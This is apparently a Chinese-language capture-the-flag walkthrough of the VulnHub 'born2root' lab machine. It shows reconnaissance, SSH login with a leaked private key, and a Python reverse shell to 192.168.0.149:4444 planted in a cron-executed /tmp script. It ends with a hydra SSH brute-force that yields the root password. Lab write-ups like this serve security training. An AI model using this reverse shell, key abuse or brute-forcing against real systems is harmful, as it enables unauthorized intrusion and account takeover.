0x00 项目地址
https://download.vulnhub.com/born2root/born2root.ova
0x01 靶机渗透
主机发现
arp-scan -l
nmap 192.168.0.103 -sV
发现与其他不同的是靶机开启了111端口,使用命令searchsploit rpcbind查看是否有对应版本的脚本,没有对应版本,那么应该不是这个端口的问题
访问靶机网页,发现了三个角色以及其中一个角色的联系方式
打开御剑进行目录遍历,发现了一个目录泄露在/icons
访问该网页发现了一个rsa私钥,刚进入网页时得到了一个用户名@网络地址格式,是在暗示我们登陆这个用户,所以输入命令wget http://靶机IP/icons/VDSoyuAXiO.txt将该文件下载
为使用该文件登陆martin用户,需要先给文件读写授权再使用ssh连接
chmod 600 VDSoyuAXiO.txt
ssh martin@192.168.0.103 -i VDSoyuAXiO.txt
登陆成功后使用cat /etc/passwd发现了martinhadijimmy三个用户,在使用命令find / -perm -u=s -type f 2>/dev/null查看具有su权限的程序,发现了exim4可以利用
使用/user/sbin/exim4 --version查看其对应版本,再输入命令searchsploit exim寻找对应脚本
使用nc命令将脚本传到靶机
输入命令chmod 777 46996.sh进行所有权授权,然后再输入./46996.sh -m netcat执行,但是发现该靶机禁止一切用户打开任何端口,所有导致脚本运行失败
那么我们再输入cat /etc/crontab查看定时任务,发现用户jimny会每隔五分钟执行/tmp/sekurity.py文件
构造sekurity.py文件内容,输入
import os,socket,subprocess
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('192.168.0.149',4444))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(['/bin/bash','-i'])
任何使用nc命令传输到/tmp文件夹下
原终端输入nc -lvvp 4444等待五分钟后连接
但是jimmy也没有root权限,那么最后一个用户habi只能使用暴力破解ssh登录了,在http://tools.hackxc.cc/cai/获得密码本
任何使用命令hydra -l hadi -P passwd.txt ssh://192.168.0.103 -v 进行爆破,获得密码为hadi123
登录发现该用户直接使用其密码获得root权限
